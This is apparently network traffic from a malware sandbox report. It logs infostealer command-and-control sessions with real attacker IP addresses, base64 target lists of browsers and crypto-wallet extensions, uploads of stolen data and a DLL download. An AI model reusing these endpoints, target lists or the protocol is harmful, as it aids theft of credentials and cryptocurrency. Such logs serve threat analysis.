                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:12.967823029 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                              Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.003951073 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAA
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 267
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="message"plugins------DHCGIDHDAKJECBFHCBAA--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443103075 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:13 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 7116
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443285942 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                              Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443341970 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                              Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443434000 CET672INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                              Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443620920 CET1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                                                                                                                                                                                                              Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.443655968 CET1236INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44
                                                                                                                                                                                                                                                              Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHw
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.451554060 CET492INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58
                                                                                                                                                                                                                                                              Data Ascii: IFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.812210083 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 268
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="message"fplugins------KFIEHIIIJDAAAAAAKECB--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:14.250932932 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:14 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 108
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:14.361412048 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 8275
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:14.361442089 CET8275OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63
                                                                                                                                                                                                                                                              Data Ascii: ------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.340879917 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:14 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.713258982 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:16.150073051 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:15 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                              ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 1106998
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:16.150213957 CET224INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:16.152328968 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              59192.168.2.450124212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:11.520626068 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:12.786649942 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:12 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              60192.168.2.450129185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:13.949846983 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019812001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.271295071 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              61192.168.2.450131185.156.73.23805548C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:14.287843943 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
